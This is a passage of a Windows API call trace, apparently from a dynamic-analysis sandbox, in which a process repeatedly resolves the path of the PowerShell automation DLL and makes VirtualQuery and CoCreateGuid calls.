	[0226.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.528] GetLastError () returned 0x0
	[0226.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.528] GetLastError () returned 0x0
	[0226.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.529] GetLastError () returned 0x0
	[0226.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.529] GetLastError () returned 0x0
	[0226.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.529] GetLastError () returned 0x0
	[0226.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.529] GetLastError () returned 0x0
	[0226.529] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.529] GetLastError () returned 0x0
	[0226.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.530] GetLastError () returned 0x0
	[0226.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.530] GetLastError () returned 0x0
	[0226.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.530] GetLastError () returned 0x0
	[0226.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.530] GetLastError () returned 0x0
	[0226.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.530] GetLastError () returned 0x0
	[0226.530] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.530] GetLastError () returned 0x0
	[0226.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.531] GetLastError () returned 0x0
	[0226.531] VirtualQuery (in: lpAddress=0x29d0d0, lpBuffer=0x29e0d0, dwLength=0x1c | out: lpBuffer=0x29e0d0*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.531] GetLastError () returned 0x0
	[0226.531] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.531] GetLastError () returned 0x0
	[0226.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.532] GetLastError () returned 0x0
	[0226.532] VirtualQuery (in: lpAddress=0x29d0d0, lpBuffer=0x29e0d0, dwLength=0x1c | out: lpBuffer=0x29e0d0*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.532] GetLastError () returned 0x0
	[0226.532] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.532] GetLastError () returned 0x0
	[0226.533] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.533] GetLastError () returned 0x0
	[0226.533] VirtualQuery (in: lpAddress=0x29d0d0, lpBuffer=0x29e0d0, dwLength=0x1c | out: lpBuffer=0x29e0d0*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.534] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.534] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.536] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.536] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.537] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.537] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.537] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.537] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.538] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.538] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.539] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.540] VirtualQuery (in: lpAddress=0x29cf0c, lpBuffer=0x29df0c, dwLength=0x1c | out: lpBuffer=0x29df0c*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.540] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.541] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.541] VirtualQuery (in: lpAddress=0x29d068, lpBuffer=0x29e068, dwLength=0x1c | out: lpBuffer=0x29e068*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.542] VirtualQuery (in: lpAddress=0x29d0a4, lpBuffer=0x29e0a4, dwLength=0x1c | out: lpBuffer=0x29e0a4*(BaseAddress=0x29d000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.542] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x4f79b35a, Data2=0x7a2e, Data3=0x45ae, Data4=([0]=0x9b, [1]=0xc9, [2]=0x5b, [3]=0xce, [4]=0x5b, [5]=0x77, [6]=0x8f, [7]=0x98))) returned 0x0
	[0226.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.543] GetLastError () returned 0x0
	[0226.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.543] GetLastError () returned 0x0
	[0226.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.543] GetLastError () returned 0x0
	[0226.543] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.543] GetLastError () returned 0x0
	[0226.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.544] GetLastError () returned 0x0
	[0226.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.638] GetLastError () returned 0x0
	[0226.639] CoCreateGuid (in: pguid=0x29e418 | out: pguid=0x29e418*(Data1=0x171e6866, Data2=0x1ea4, Data3=0x4306, Data4=([0]=0x86, [1]=0xae, [2]=0xe6, [3]=0x4, [4]=0x9a, [5]=0x33, [6]=0x35, [7]=0xd4))) returned 0x0
	[0226.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.639] GetLastError () returned 0x0
	[0226.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.639] GetLastError () returned 0x0
	[0226.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.639] GetLastError () returned 0x0
	[0226.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29db28, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.640] GetLastError () returned 0x0
	[0226.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.640] GetLastError () returned 0x0
	[0226.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dad8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.640] GetLastError () returned 0x0
	[0226.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.640] GetLastError () returned 0x0
	[0226.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.640] GetLastError () returned 0x0
	[0226.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.640] GetLastError () returned 0x0
	[0226.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.641] GetLastError () returned 0x0
	[0226.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.641] GetLastError () returned 0x0
	[0226.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.641] GetLastError () returned 0x0
	[0226.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.641] GetLastError () returned 0x0
	[0226.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.642] GetLastError () returned 0x0
	[0226.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.642] GetLastError () returned 0x0
	[0226.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dcc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.642] GetLastError () returned 0x0
	[0226.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.642] GetLastError () returned 0x0
	[0226.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29dc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.642] GetLastError () returned 0x0
	[0226.642] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.643] GetLastError () returned 0x0
	[0226.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.643] GetLastError () returned 0x0
	[0226.643] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0226.643] GetLastError () returned 0x0
	[0226.644] VirtualQuery (in: lpAddress=0x29ccc4, lpBuffer=0x29dcc4, dwLength=0x1c | out: lpBuffer=0x29dcc4*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0226.644] VirtualQuery (in: lpAddress=0x29cd00, lpBuffer=0x29dd00, dwLength=0x1c | out: lpBuffer=0x29dd00*(BaseAddress=0x29c000, AllocationBase=0x260000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
